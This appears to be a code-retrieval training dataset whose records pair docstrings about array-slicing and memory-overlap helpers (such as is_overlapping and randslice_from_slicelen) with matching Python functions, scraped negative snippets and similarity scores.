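`cmp_structure` above relies on an external `slice_shape` helper. A minimal self-contained version, assuming rectangular nesting and one slice per dimension; the recursive `slice_shape` here is a reconstruction for illustration, not the corpus helper:

def slice_shape(lst, slices):
    # shape of lst[slices] for a rectangular nested list
    if not slices:
        return []
    head = lst[slices[0]]
    inner = head[0] if head else []
    return [len(head)] + slice_shape(inner, slices[1:])

def cmp_structure(llst, rlst, lslices, rslices):
    lshape = slice_shape(llst, lslices)
    rshape = slice_shape(rlst, rslices)
    if len(lshape) != len(rshape):
        return -1
    for ls, rs in zip(lshape, rshape):
        if ls != rs:
            return -1
        if ls == 0:
            return 0
    return 0

a = [[1, 2, 3], [4, 5, 6]]
b = [[7, 8, 9, 10], [11, 12, 13, 14]]
# both slicings produce a 2x3 structure, so the shapes compare equal
assert cmp_structure(a, b, (slice(0, 2), slice(0, 3)), (slice(0, 2), slice(1, 4))) == 0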
The structure 't' is overlapping if at least one memory location is visited twice while iterating through all possible tuples of indices.
def is_overlapping(t):
    memlen, itemsize, ndim, shape, strides, offset = t
    visited = 1<<memlen
    for ind in indices(shape):
        i = memory_index(ind, t)
        bit = 1<<i
        if visited & bit:
            return True
        visited |= bit
    return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_overlapping(t):\n memlen, itemsize, ndim, shape, strides, offset = t\n visited = 1 << memlen\n for ind in indices(shape):\n i = memory_index(ind, t)\n bit = 1 << i\n if visited & bit:\n return True\n visited |= bit\n return False", "def listOfOverlappingTTPairs():\n listOfHalfModules = listOfTTHalfModules()\n ttmap = TTModulesMap_instance\n pairs = []\n regions = {'A':1, 'B':2, 'C':3}\n print \"Overlapping TT half modules:\"\n for hm1 in listOfHalfModules:\n for hm2 in listOfHalfModules:\n # they must be different\n if hm1 == hm2: continue\n # they must be both on top or both on bottom\n if locateTTHalfModule(hm1)[3] != locateTTHalfModule(hm2)[3]: continue\n # they must be on the same layer\n if locateTTHalfModule(hm1)[0] != locateTTHalfModule(hm2)[0]: continue\n # avoid duplicates\n if (hm1, hm2) in pairs: continue\n if (hm2, hm1) in pairs: continue\n # they must be contiguous:\n if (locateTTHalfModule(hm1)[1] == locateTTHalfModule(hm2)[1]):\n if (abs(locateTTHalfModule(hm1)[2] - locateTTHalfModule(hm2)[2]) == 1):\n pairs.append( (hm1, hm2) )\n else:\n num1 = locateTTHalfModule(hm1)[2]\n num2 = locateTTHalfModule(hm2)[2]\n max1 = ttmap.numberOfModules[locateTTHalfModule(hm1)[0]]['Region'+locateTTHalfModule(hm1)[1]] - 1\n max2 = ttmap.numberOfModules[locateTTHalfModule(hm2)[0]]['Region'+locateTTHalfModule(hm2)[1]] - 1\n nreg1 = regions[locateTTHalfModule(hm1)[1]]\n nreg2 = regions[locateTTHalfModule(hm2)[1]]\n if ( (num1==max1 and num2==0 and nreg2-nreg1==1) or (num2==max2 and num1==0 and nreg1-nreg2==1) ):\n pairs.append( (hm1, hm2) )\n print '\\t', hm1, hm2\n ## - same region\n #if ((abs(locateTTHalfModule(hm1)[2] - locateTTHalfModule(hm2)[2]) != 1)\n # and (locateTTHalfModule(hm1)[0] != locateTTHalfModule(hm2)[0])): continue\n ## - or neighbouring region\n #elif not ((locateTTHalfModule(hm1)[0] != locateTTHalfModule(hm2)[0])\n # and ( ( (ttmap.numberOfModules[locateTTHalfModule(hm1)[0]] == locateTTHalfModule(hm1)[2]+1 )\n # and (locateTTHalfModule(hm2)[2] == 0) )\n # or ( (ttmap.numberOfModules[locateTTHalfModule(hm2)[0]] == locateTTHalfModule(hm2)[2]+1 )\n # and (locateTTHalfModule(hm1)[2] == 0) ) ) ): continue\n ## append to list of pairs\n #pairs.append( (hm1, hm2) )\n print\n return pairs", "def test_idx_overlap():\n # Base array\n arr = np.arange(10)\n\n # Test subset overlap\n idx = u.idx_overlap(arr, np.arange(5, 8))\n assert len(idx) == 3\n\n # Test complete overlap\n idx = u.idx_overlap(arr, np.arange(-5, 20))\n assert len(idx) == 8\n\n # Test partial right overlap\n idx = u.idx_overlap(arr, np.arange(5, 20))\n assert len(idx) == 4\n\n # Test partial left overlap\n idx = u.idx_overlap(arr, np.arange(-5, 5))\n assert len(idx) == 4\n\n # Test no overlap\n idx = u.idx_overlap(arr, np.arange(10, 20))\n assert len(idx) == 0", "def _pair_indices(self):\n indices_src = []\n indices_dst = []\n for i in range(self.walk_len):\n for j in range(max(i - self.l, 0), i):\n indices_src.append(i)\n indices_dst.append(j)\n for j in range(i + 1, min(i + self.r + 1, self.walk_len)):\n indices_src.append(i)\n indices_dst.append(j)\n return indices_src, indices_dst", "def _test_pairs(self, idx0, idx1):\n pass", "def overlap_conflict(out, *inputs):\n from . 
import _bh\n\n for i in inputs:\n if not np.isscalar(i):\n if np.may_share_memory(out, i) and not _bh.same_view(out, i):\n return True\n return False", "def overlaps(self, indices):\n p_indices = []\n shape = []\n\n if not indices:\n return p_indices, shape\n\n for index, (r0, r1), size in zip(indices, self.location, self.shape):\n if isinstance(index, slice):\n stop = size\n if index.stop < r1:\n stop -= r1 - index.stop\n\n start = index.start - r0\n if start < 0:\n start %= index.step # start is now +ve\n\n if start >= stop:\n # This partition does not span the slice\n return None, None\n\n # Still here?\n step = index.step\n index = slice(start, stop, step)\n index_size, rem = divmod(stop - start, step)\n if rem:\n index_size += 1\n\n else:\n\n # Still here?\n index = [i - r0 for i in index if r0 <= i < r1]\n index_size = len(index)\n if index_size == 0:\n return None, None\n elif index_size == 1:\n index = slice(index[0], index[0] + 1)\n else:\n index0 = index[0]\n step = index[1] - index0\n if step > 0:\n start, stop = index0, index[-1] + 1\n elif step < 0:\n start, stop = index0, index[-1] - 1\n if index == list(range(start, stop, step)):\n # Replace the list with a slice object\n if stop < 0:\n stop = None\n index = slice(start, stop, step)\n # --- End: if\n\n p_indices.append(index)\n shape.append(index_size)\n # --- End: for\n\n # Still here? Then this partition does span the slice and the\n # elements of this partition specified by p_indices are in the\n # slice.\n return p_indices, shape", "def is_redundant(t, t_objects):\n\n x,y,w,h = t.bounding_box\n\n for tracker in t_objects:\n if t.face_id == tracker.face_id:\n continue\n x_t, y_t, w_t, h_t = tracker.bounding_box\n result = in_rect(np.array([[x,y],[x+w,y], [x,y+h], [x+w,y+h]]),\n (x_t, y_t), (x_t+w_t, y_t+h_t))\n\n if sum(result) > 1:\n return True\n return False", "def duplicates(self, tuples):\n b, k, l, r = tuples.size()\n\n primes = self.primes[:r]\n primes = primes[None, None, None, :].expand(b, k, l, r)\n unique = ((tuples+1) ** primes).prod(dim=3) # unique identifier for each tuple\n\n sorted, sort_idx = torch.sort(unique, dim=2)\n _, unsort_idx = torch.sort(sort_idx, dim=2) # get the idx required to reverse the sort\n\n mask = sorted[:, :, 1:] == sorted[:, :, :-1]\n\n zs = torch.zeros(b, k, 1, dtype=torch.uint8, device='cuda' if self.use_cuda else 'cpu')\n mask = torch.cat([zs, mask], dim=2)\n\n return torch.gather(mask, 2, unsort_idx)", "def get_overlapping_indices(self):\n return self._get_atomic_overlaps()", "def neighbours(t,p):\r\n neighbour = set()\r\n\r\n if p[t][1] != 0:\r\n neighbour.add(tuple(p[t][1]))\r\n if p[t][2] != 0:\r\n neighbour.add(tuple(p[t][2]))\r\n if p[t][3] != 0:\r\n neighbour.add(tuple(p[t][3]))\r\n if p[t][4] != 0:\r\n neighbour.add(tuple(p[t][4]))\r\n \r\n return neighbour", "def overlapping(x,y):\n for i in range(0,len(x)):\n for j in range(0,len(y)):\n if x[i] == y[j]:\n return True\n else:\n continue#reapet until finished all number in the list\n return False", "def overlap_with(self, other):", "def neighbours(assignment): \n for index_1, index_2 in itertools.combinations(range(len(assignment)), 2):\n new_assign = list(assignment)\n new_assign[index_1], new_assign[index_2] = new_assign[index_2], new_assign[index_1]\n yield tuple(new_assign)", "def full(self):\n for x in range(0,3):\n for y in range(0,3):\n if self[x,y] is None:\n return False\n return True", "def checkForOverlappingTasks(tasks, machines):\n for m in machines:\n compatibleTasks = []\n for t in tasks:\n if m == 
t.machine:\n compatibleTasks.append(t)\n slots = [] # time slot\n for ct in compatibleTasks:\n thisSlot = (ct.tBegin, ct.tEnd)\n if thisSlot not in slots:\n slots.append(thisSlot)\n # print(thisSlot)\n slots = sorted(slots)\n for s, slt in enumerate(slots[:-1]):\n for slt2 in slots[s+1:]:\n if slt[1] > slt2[0]:\n print(slt)\n print(slt2)\n return True\n return False", "def __get_index_pair__(self, target_tile:Union[StaticTile, DynamicTile]) -> tuple:\n for colNum, col in enumerate(self.map):\n for rowNum, tile in enumerate(col):\n if tile == target_tile:\n return (colNum, rowNum)", "def fill_overlap(previous, current, from_address,\n to_address) -> Tuple[str, List]:\n size = to_address - from_address\n return ('overlap',\n filler(memdf.name.overlap(from_address, -size), from_address,\n size, previous, current))", "def intersection_iteration(selection_space, intersect_space, self, cell):\n\n target_bed_map_array = self.target_bed_map_array\n\n iteration_count = 0\n tmp_intersection_list = []\n\n log = self.log\n\n # Get the number of unique breakpoints.\n self.seg_analyzer.break_points(cell=cell, permutation=True)\n unique_permutation_group_size = self.seg_analyzer.unique_permutation_group_size\n total_permutation_group_size = self.seg_analyzer.total_permutation_group_size\n\n # Retrieve a namedtuple of the intersect data\n total_targeted_data = [int(self.args.Total_Targeted), total_permutation_group_size-int(self.args.Total_Targeted)]\n unique_targeted_data = [int(self.args.Unique_Targeted), unique_permutation_group_size-int(self.args.Unique_Targeted)]\n\n log.info(\"Unique Combination Group Size {} for Segment Permutation: {}\"\n .format(cell, unique_permutation_group_size))\n log.info(\"Total Combination Group Size {} for Segment Permutation: {}\"\n .format(cell, total_permutation_group_size))\n\n permuted_sum_file = \"{0}{1}_{2}_seg_random_bin_total.bed\" \\\n .format(self.args.Working_Folder, self.args.Job_Name, cell)\n\n permuted_sum_file_out = open(permuted_sum_file, \"w\")\n sum_file_data = \"Total Targeted Segments\\tTotal Odds Ratio\\tTotal Fisher Ecact p_Value\\t\" \\\n \"Unique Targeted Segments\\tUnique Odds Ratio\\tUnique Fisher Exact p_Value\\n\"\n\n while iteration_count < int(self.args.Iteration_Count):\n iteration_count += 1\n # numpy.random.shuffle(selection_space)\n u = numpy.intersect1d(numpy.random.choice(selection_space, unique_permutation_group_size, replace=False),\n intersect_space)\n t = numpy.intersect1d(numpy.random.choice(selection_space, total_permutation_group_size, replace=True),\n intersect_space)\n\n if len(u) > 0:\n for seg in u:\n tmp_intersection_list.append(str(seg))\n\n t_intersect = len(t)\n u_intersect = len(u)\n t_oddsratio, t_pvalue = \\\n scipy.stats.fisher_exact([total_targeted_data, [t_intersect, total_permutation_group_size-t_intersect]])\n\n u_oddsratio, u_pvalue = \\\n scipy.stats.fisher_exact([unique_targeted_data, [u_intersect, unique_permutation_group_size-u_intersect]])\n\n sum_file_data += \"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\"\\\n .format(t_intersect, t_oddsratio, t_pvalue, u_intersect, u_oddsratio, u_pvalue)\n\n if iteration_count % int(self.args.Prog_Check) == 0:\n log.debug(\"{0} iterations of {1} for Segment Permutation Analysis using file {2}\"\n .format(iteration_count, int(self.args.Iteration_Count), permuted_sum_file))\n\n permuted_sum_file_out.write(sum_file_data)\n permuted_sum_file_out.close()\n\n log.debug(\"Processing {} data for output to segment permutation file.\".format(cell))\n\n seg_permute_data = \"For a given segment, 
how many times do targets intersect in {0} iterations?\\n\" \\\n \"chrom\\tstart\\tstop\\tSeg_ID\\tTotal_Targets\\tNumber_Per_Permutation\\tbin_size\\n\"\\\n .format(self.args.Iteration_Count)\n\n seg_counts = Counter(tmp_intersection_list)\n for seg in seg_counts:\n bed_tuple = \\\n target_bed_map_array[numpy.where(target_bed_map_array[:, 0] == int(seg))][:, 1].tolist()[0]\n\n chrom = self.bin_tracking_array[self.bin_tracking_array[:, 0] == int(seg)][0, 1].decode()\n coord_start = self.bin_tracking_array[self.bin_tracking_array[:, 0] == int(seg)][0, 2]\n coord_stop = self.bin_tracking_array[self.bin_tracking_array[:, 0] == int(seg)][0, 3]\n counts = len(bed_tuple)*seg_counts[seg]\n count = counts / int(self.args.Iteration_Count)\n bin_size = int(coord_stop) - int(coord_start)\n seg_permute_data += (\"{0}\\t{1}\\t{2}\\t{3}\\t{4}\\t{5}\\t{6}\\n\"\n .format(chrom, coord_start, coord_stop, seg, counts, count, bin_size))\n\n seg_permute_file = open(\"{0}{1}_{2}_seg_permute.txt\"\n .format(self.args.Working_Folder, self.args.Job_Name, cell), 'w')\n\n seg_permute_file.write(seg_permute_data)\n seg_permute_file.close()\n\n # Tool_Box.delete([\"{}{}_{}.log\".format(self.args.Working_Folder, self.args.Job_Name, cell)])\n log.info(\"{} Permutation Complete\".format(cell))\n\n return", "def test_overlap():\n events = [['Event', '2017-11-21T10:00:00-08:00', '2017-11-21T11:00:00-08:00'],\n ['Event', '2017-11-21T10:30:00-08:00', '2017-11-21T11:20:00-08:00']]\n freetimes, _ = free(events, 9, 0, 17, 0, day_range, 30)\n fmt_freetime = output_format(freetimes)\n for i in fmt_freetime:\n print(i)\n assert fmt_freetime == ['Tue, Nov 21, 9:00 am to Tue, Nov 21, 10:00 am.',\n 'Tue, Nov 21, 11:20 am to Tue, Nov 21, 5:00 pm.',\n 'Wed, Nov 22, 9:00 am to Wed, Nov 22, 5:00 pm.',\n 'Thu, Nov 23, 9:00 am to Thu, Nov 23, 5:00 pm.',\n 'Fri, Nov 24, 9:00 am to Fri, Nov 24, 5:00 pm.',\n 'Sat, Nov 25, 9:00 am to Sat, Nov 25, 5:00 pm.',\n 'Sun, Nov 26, 9:00 am to Sun, Nov 26, 5:00 pm.',\n 'Mon, Nov 27, 9:00 am to Mon, Nov 27, 5:00 pm.']", "def naive(p, t):\n occurences = []\n for i in range(len(t) - len(p) + 1):\n match = True\n for j in range(len(p)):\n if t[i + j] != p[j]:\n match = False\n break\n if match:\n occurences.append(i)\n return occurences", "def untie_everything(self):\r\n self.tied_indices = []", "def _gen_matches(target_units, source_units, stoplist_set, features_size):\n for hits2positions in gen_hits2positions(\n target_units, source_units, stoplist_set, features_size):\n overhits2positions = {\n k: np.array(v) for k, v in hits2positions.items()\n if len(v) >= 2}\n for (t_ind, s_ind), positions in overhits2positions.items():\n yield (t_ind, s_ind, positions)", "def naive(p, t):\n\toccurence = []\n\tfor i in range(len(t)-len(p) + 1):\n\t\tmatch = True\n\t\tfor j in range(len(p)):\n\t\t\tif not p[j] == t[i+j]:\n\t\t\t\tmatch = False\n\t\t\t\tbreak\n\t\tif match:\n\t\t\toccurence.append(i)\n\treturn occurence", "def assert_mapping_consistency(layout):\n values = sorted(layout.values())\n keys = list(layout)\n ref_keys = [\"q\" + str(i) for i in range(len(keys))]\n if keys != ref_keys:\n raise PlacementError(\"Some physical qubits in the layout may be missing or duplicated.\")\n if values != list(range(len(values))):\n raise PlacementError(\"Some logical qubits in the layout may be missing or duplicated.\")", "def naive_2mm(p, t):\n\toccurence = []\n\tfor i in range(len(t)-len(p) + 1):\n\t\tmatch = True\n\t\tunmatch = 0\n\t\tfor j in range(len(p)):\n\t\t\tif not p[j] == t[i+j]:\n\t\t\t\tunmatch += 
1\n\t\t\t\tif unmatch > 2:\n\t\t\t\t\tmatch = False\n\t\t\t\t\tbreak\n\t\tif match:\n\t\t\toccurence.append(i)\n\treturn occurence", "def shrink_offset_pairs(self):\n\n def int_from_block(i):\n u, v = self.blocks[i].bounds\n block_bytes = self.shrink_target.buffer[u:v]\n return int_from_bytes(block_bytes)\n\n def block_len(i):\n return self.blocks[i].length\n\n # Try reoffseting every pair\n def reoffset_pair(pair, o):\n n = len(self.blocks)\n # Number of blocks may have changed, need to validate\n valid_pair = [\n p\n for p in pair\n if p < n and int_from_block(p) > 0 and self.is_payload_block(p)\n ]\n\n if len(valid_pair) < 2:\n return\n\n m = min([int_from_block(p) for p in valid_pair])\n\n new_blocks = [\n self.shrink_target.buffer[u:v]\n for u, v in self.shrink_target.all_block_bounds()\n ]\n for i in valid_pair:\n new_blocks[i] = int_to_bytes(int_from_block(i) + o - m, block_len(i))\n buffer = hbytes().join(new_blocks)\n return self.incorporate_new_buffer(buffer)\n\n def is_non_zero_payload(block):\n return not block.all_zero and self.is_payload_block(block.index)\n\n for block_i, block_j in self.each_pair_of_blocks(\n is_non_zero_payload, is_non_zero_payload\n ):\n i = block_i.index\n j = block_j.index\n\n value_i = int_from_block(i)\n value_j = int_from_block(j)\n\n offset = min(value_i, value_j)\n Integer.shrink(\n offset, lambda o: reoffset_pair((i, j), o), random=self.random\n )", "def MeshVtxAdjacentVtxs (strMesh, index, blnAbsolutConnections=False, blnCreate=False):\n \"\"\"custom function\"\"\"\n #-----------------------------------------------------------------------------------------------------------------------------------------\n def CullDuplicates(seq, idfun=None): \n # order preserving \n if idfun is None: \n def idfun(x): return x \n seen = {} \n result = [] \n for item in seq: \n marker = idfun(item) \n if marker in seen: continue \n seen[marker] = 1 \n result.append(item) \n return result\n #-----------------------------------------------------------------------------------------------------------------------------------------\n MeshVtxAdjacentVtxs = []\n if rs.IsMesh(strMesh)==False : \n print \"strMesh is not an mesh\"\n return None\n if type(index)==type(\"string\"):\n print \"index is not an integer\"\n return None\n if type(index)==type(0.1): index = int(index)\n\n arrVertices = rs.MeshVertices (strMesh)\n arrFaceVertices = rs.MeshFaceVertices(strMesh)\n\n intCount = 0\n arrAdjacentVtxs = []\n for arrFace in arrFaceVertices:\n blnIsAdjacent = False\n for arrVtxIndex in arrFace:\n if arrVtxIndex == index :\n blnIsAdjacent = True\n if blnIsAdjacent :\n if blnAbsolutConnections :\n if arrFace[2]==arrFace[3] :\n for arrVtxIndex in arrFace :\n if arrVtxIndex != index :\n arrAdjacentVtxs.append( arrVtxIndex)\n else :\n if index == arrFace[0] :\n arrAdjacentVtxs.append( arrFace[3] )\n arrAdjacentVtxs.append( arrFace[1] )\n elif index == arrFace[1] :\n arrAdjacentVtxs.append( arrFace[0] )\n arrAdjacentVtxs.append( arrFace[2] )\n elif index == arrFace[2] :\n arrAdjacentVtxs.append( arrFace[1] )\n arrAdjacentVtxs.append( arrFace[3] )\n elif index == arrFace(3) :\n arrAdjacentVtxs.append( arrFace[2] )\n arrAdjacentVtxs.append( arrFace[0] )\n else :\n for arrVtxIndex in arrFace :\n if arrVtxIndex != index :\n arrAdjacentVtxs.append( arrVtxIndex )\n if type(arrAdjacentVtxs) != type([]) : return None\n arrOrderAdjacentVtxs = CullDuplicates(arrAdjacentVtxs)\n if blnCreate :\n arrStrPts = []\n for arrVtxIndex in arrOrderAdjacentVtxs:\n rs.AddPoint ( arrVertices[arrVtxIndex] 
)\n arrStrPts.append( arrVertices[arrVtxIndex] )\n return arrStrPts\n else :\n return arrOrderAdjacentVtxs", "def _maketriples_all(self):\n nholes = self.ctrs.shape[0]\n tlist = []\n for i in range(nholes):\n for j in range(nholes):\n for k in range(nholes):\n if i < j and j < k:\n tlist.append((i, j, k))\n tarray = np.array(tlist).astype(np.int)\n if self.verbose:\n print(\"tarray\", tarray.shape, \"\\n\", tarray)\n\n tname = []\n uvlist = []\n # foreach row of 3 elts...\n for triple in tarray:\n tname.append(\"{0:d}_{1:d}_{2:d}\".format(\n triple[0], triple[1], triple[2]))\n if self.verbose:\n print('triple:', triple, tname[-1])\n uvlist.append((self.ctrs[triple[0]] - self.ctrs[triple[1]],\n self.ctrs[triple[1]] - self.ctrs[triple[2]]))\n #print(len(uvlist), \"uvlist\", uvlist)\n if self.verbose:\n print(tarray.shape, np.array(uvlist).shape)\n return tarray, np.array(uvlist)", "def check_overlap(current, hit, overlap = 200):\n for prev in current:\n p_coords = prev[2:4]\n coords = hit[2:4]\n if get_overlap(coords, p_coords) >= overlap:\n return True\n return False" ]
[ "0.71436214", "0.6230163", "0.54177374", "0.53693205", "0.526794", "0.52386534", "0.5171279", "0.5169592", "0.5149605", "0.5122925", "0.5052315", "0.50437593", "0.5038537", "0.5037338", "0.5033946", "0.49886644", "0.49637598", "0.49573925", "0.495004", "0.49486208", "0.49379534", "0.49083477", "0.490449", "0.49014556", "0.48968804", "0.48890892", "0.48780963", "0.4869522", "0.48581892", "0.48539877" ]
0.7153341
0
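`is_overlapping` above unpacks a tuple `t` and calls `indices`/`memory_index`, which are outside the entry. A self-contained sketch of the same idea, assuming non-negative strides and using a set in place of the bitmask trick:

from itertools import product

def is_overlapping(memlen, itemsize, shape, strides, offset):
    # record the byte index where each element starts; a repeat means overlap
    visited = set()
    for ind in product(*(range(n) for n in shape)):
        i = offset + sum(k * s for k, s in zip(ind, strides))
        assert 0 <= i <= memlen - itemsize
        if i in visited:
            return True
        visited.add(i)
    return False

# 2x2 elements whose rows are one byte apart collide; two bytes apart do not
assert is_overlapping(4, 1, (2, 2), (1, 1), 0) is True
assert is_overlapping(4, 1, (2, 2), (2, 1), 0) is False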
Create a random slice of len slicelen that fits into listlen.
def randslice_from_slicelen(slicelen, listlen):
    maxstart = listlen - slicelen
    start = randrange(maxstart+1)
    maxstep = (listlen - start) // slicelen if slicelen else 1
    step = randrange(1, maxstep+1)
    stop = start + slicelen * step
    s = slice(start, stop, step)
    _, _, _, control = slice_indices(s, listlen)
    if control != slicelen:
        raise RuntimeError
    return s
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def randslice_from_slicelen(slicelen, listlen):\n maxstart = listlen - slicelen\n start = randrange(maxstart + 1)\n maxstep = (listlen - start) // slicelen if slicelen else 1\n step = randrange(1, maxstep + 1)\n stop = start + slicelen * step\n s = slice(start, stop, step)\n _, _, _, control = slice_indices(s, listlen)\n if control != slicelen:\n raise RuntimeError\n return s", "def random_slice(l: list, size: int) -> list:\n first = randint(0, len(l) - size)\n return l[first:first+size]", "def rslice(n, allow_empty=False):\n minlen = 0 if allow_empty or n == 0 else 1\n slicelen = randrange(minlen, n + 1)\n return randslice_from_slicelen(slicelen, n)", "def rslice(n, allow_empty=False):\n minlen = 0 if allow_empty or n == 0 else 1\n slicelen = randrange(minlen, n+1)\n return randslice_from_slicelen(slicelen, n)", "def selectRandomSubListFromListWithRepl(ldata, num):\n\treturn list(map(lambda i : selectRandomFromList(ldata), range(num)))", "def generate_list(length: int) -> list:\n\n return [randint(0, length + 1) for _ in range(length)]", "def generate_list(size):\n items = [randint(0, MAX_NUM) for i in range(size)]\n return items", "def random_subsequence(seq, length, min_stride=1, max_stride=1):\n # First pick a stride.\n if max_stride == min_stride:\n stride = min_stride\n else:\n stride = np.random.randint(min_stride, max_stride+1)\n\n # Now pick the starting index.\n # If the subsequence starts at index i, then its final element will be at\n # index i + (length - 1) * stride, which must be less than the length of\n # the sequence. Therefore i must be less than maxval, where:\n maxval = len(seq) - (length - 1) * stride\n start = np.random.randint(0, maxval)\n end = start + 1 + (length - 1) * stride\n return seq[start:end:stride]", "def selectRandomFromList(ldata):\n\treturn ldata[randint(0, len(ldata)-1)]", "def generate_equal_slices(list_to_slice, batch_size):\n\n assert len(list_to_slice) > 1\n\n list_slices = []\n\n sample_size = len(list_to_slice)\n\n for start_i in range(0, sample_size, batch_size):\n end_i = start_i + batch_size\n aslice = list_to_slice[start_i:end_i]\n if len(aslice) < batch_size:\n aslice_rep = aslice * math.ceil(batch_size/len(aslice))\n aslice = aslice_rep[:batch_size]\n\n assert len(aslice) == batch_size\n\n list_slices.append(aslice)\n\n return list_slices", "def selectRandomSubListFromList(ldata, num):\n\tassertLesser(num, len(ldata), \"size of sublist to be sampled greater than or equal to main list\")\n\ti = randint(0, len(ldata)-1)\n\tsel = ldata[i]\n\tselSet = {i}\n\tselList = [sel]\n\twhile (len(selSet) < num):\n\t\ti = randint(0, len(ldata)-1)\n\t\tif (i not in selSet):\n\t\t\tsel = ldata[i]\n\t\t\tselSet.add(i)\n\t\t\tselList.append(sel)\t\t\n\treturn selList", "def getRandomFromList(self, l):\n if (len(l) == 0):\n return -1\n return l[randint(0, len(l) - 1)]", "def random_subset(array, count):\n indices = np.random.permutation(len(array))[:count]\n return array[indices]", "def populate_array_random(arr_length):\n arr = []\n for i in range(int(arr_length)):\n arr.append(random.randint(-100000, 100000))\n return arr", "def get_unsorted_list(size,MaxN=1000,MinN=0):\n return [random.randint(MinN,MaxN) for i in xrange(size)]", "def get_slice_from_list(self,list_,start=0,end=None):\r\n start = self._index_to_int(start,True)\r\n if end is not None:\r\n end= self._index_to_int(end)\r\n\r\n return list_[start:end]", "def some_simple_data(length=1000000):\n data = list(range(length))\n random.shuffle(data)\n return data", "def rand_list(n, limit):\n g = 
[]\n while n > 0:\n g.append(random.randrange(limit))\n n -= 1\n return g", "def getRandomList(n):\n lyst = list()\n for count in range (n):\n lyst.append(random.randint(1, n))\n return lyst", "def rand_bytes_range(minlen, maxlen):\n return rand_bytes(random.randint(minlen, maxlen))", "def crop(array, length, deterministic=False):\n if len(array) > length:\n if not deterministic:\n pos = np.random.randint(len(array) - length + 1)\n array = array[pos:pos + length:]\n else:\n l = len(array)\n array = array[(l - length) // 2:(l + length) // 2]\n return array", "def generateRandomList(minval, maxval, size):\n return [random.randint(minval, maxval) for _ in range(size)]", "def individual(length, min, max):\r\n return [ randint(min, max) for x in range(length) ]", "def slice(data, size):\n\treturn dice(data, size).T", "def create_list(self):\n\n\t\trandom_list = random.sample(range(0, 500), 10)\n\n\t\treturn random_list", "def shuffle_slice(a, start, stop):\n i = start\n while (i < stop-1):\n idx = random.randrange(i, stop)\n a[i], a[idx] = a[idx], a[i]\n i += 1", "def populate_empty_list():\n\n from random import randint, seed\n seed(56)\n l = []\n for i in range(100):\n l.append(randint(0, 100))\n print(l[34:56])", "def _rand_subset(self, iterable, num_elems):\n\n lst = list(iterable)\n assert num_elems <= len(lst)\n\n out = []\n\n while len(out) < num_elems:\n elem = self._rand_elem(lst)\n lst.remove(elem)\n out.append(elem)\n\n return out", "def slice_list(list_to_slice, *upper_bounds):\n list_to_return=[]\n for upper_bound in upper_bounds:\n if (len(list_to_slice)>upper_bound):\n print('Slicing...')\n list_to_return.append(list_to_slice[:upper_bound])\n else:\n list_to_return.append(None)\n \n return list_to_return", "def partial_shuffle(l, start, end):\n l[start:end] = sorted(l[start:end], key=lambda x: random.random())\n return l" ]
[ "0.83833927", "0.80226773", "0.714893", "0.7132235", "0.6567857", "0.6413113", "0.62118304", "0.61636114", "0.6134608", "0.6101278", "0.61010647", "0.6062314", "0.60282576", "0.6016087", "0.59929234", "0.5939068", "0.59296066", "0.59249735", "0.59247345", "0.5907804", "0.5882826", "0.5880306", "0.5863617", "0.58498406", "0.5843864", "0.5826133", "0.5813354", "0.58061206", "0.5777072", "0.57761395" ]
0.8387383
0
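`randslice_from_slicelen` above calls an external `slice_indices` helper; the standard `slice.indices()` method gives the same length check. A runnable restatement:

from random import randrange

def randslice_from_slicelen(slicelen, listlen):
    # random slice of exactly `slicelen` items that fits a list of `listlen`
    maxstart = listlen - slicelen
    start = randrange(maxstart + 1)
    maxstep = (listlen - start) // slicelen if slicelen else 1
    step = randrange(1, maxstep + 1)
    s = slice(start, start + slicelen * step, step)
    assert len(range(*s.indices(listlen))) == slicelen
    return s

lst = list(range(10))
assert len(lst[randslice_from_slicelen(4, len(lst))]) == 4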
Create two sets of slices for an array x with shape 'shape' such that shapeof(x[lslices]) == shapeof(x[rslices]).
def randslice_from_shape(ndim, shape):
    lslices = [0] * ndim
    rslices = [0] * ndim
    for n in range(ndim):
        l = shape[n]
        slicelen = randrange(1, l+1) if l > 0 else 0
        lslices[n] = randslice_from_slicelen(slicelen, l)
        rslices[n] = randslice_from_slicelen(slicelen, l)
    return tuple(lslices), tuple(rslices)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def randslice_from_shape(ndim, shape):\n lslices = [0] * ndim\n rslices = [0] * ndim\n for n in range(ndim):\n l = shape[n]\n slicelen = randrange(1, l + 1) if l > 0 else 0\n lslices[n] = randslice_from_slicelen(slicelen, l)\n rslices[n] = randslice_from_slicelen(slicelen, l)\n return tuple(lslices), tuple(rslices)", "def rslices_ndim(ndim, shape, iterations=5):\n for _ in range(iterations):\n yield tuple(rslice(shape[n]) for n in range(ndim))\n for _ in range(iterations):\n yield tuple(rslice(shape[n], allow_empty=True) for n in range(ndim))\n yield tuple(slice(0, 1, 0) for _ in range(ndim))", "def genslices_ndim(ndim, shape):\n iterables = [genslices(shape[n]) for n in range(ndim)]\n return product(*iterables)", "def genslices_ndim(ndim, shape):\n iterables = [genslices(shape[n]) for n in range(ndim)]\n return product(*iterables)", "def rslices_ndim(ndim, shape, iterations=5):\n # non-empty slices\n for _ in range(iterations):\n yield tuple(rslice(shape[n]) for n in range(ndim))\n # possibly empty slices\n for _ in range(iterations):\n yield tuple(rslice(shape[n], allow_empty=True) for n in range(ndim))\n # invalid slices\n yield tuple(slice(0,1,0) for _ in range(ndim))", "def rand_aligned_slices(maxdim=5, maxshape=16):\n ndim = randrange(1, maxdim+1)\n minshape = 2\n n = randrange(100)\n if n >= 95:\n minshape = 0\n elif n >= 90:\n minshape = 1\n all_random = True if randrange(100) >= 80 else False\n lshape = [0]*ndim; rshape = [0]*ndim\n lslices = [0]*ndim; rslices = [0]*ndim\n\n for n in range(ndim):\n small = randrange(minshape, maxshape+1)\n big = randrange(minshape, maxshape+1)\n if big < small:\n big, small = small, big\n\n # Create a slice that fits the smaller value.\n if all_random:\n start = randrange(-small, small+1)\n stop = randrange(-small, small+1)\n step = (1,-1)[randrange(2)] * randrange(1, small+2)\n s_small = slice(start, stop, step)\n _, _, _, slicelen = slice_indices(s_small, small)\n else:\n slicelen = randrange(1, small+1) if small > 0 else 0\n s_small = randslice_from_slicelen(slicelen, small)\n\n # Create a slice of the same length for the bigger value.\n s_big = randslice_from_slicelen(slicelen, big)\n if randrange(2) == 0:\n 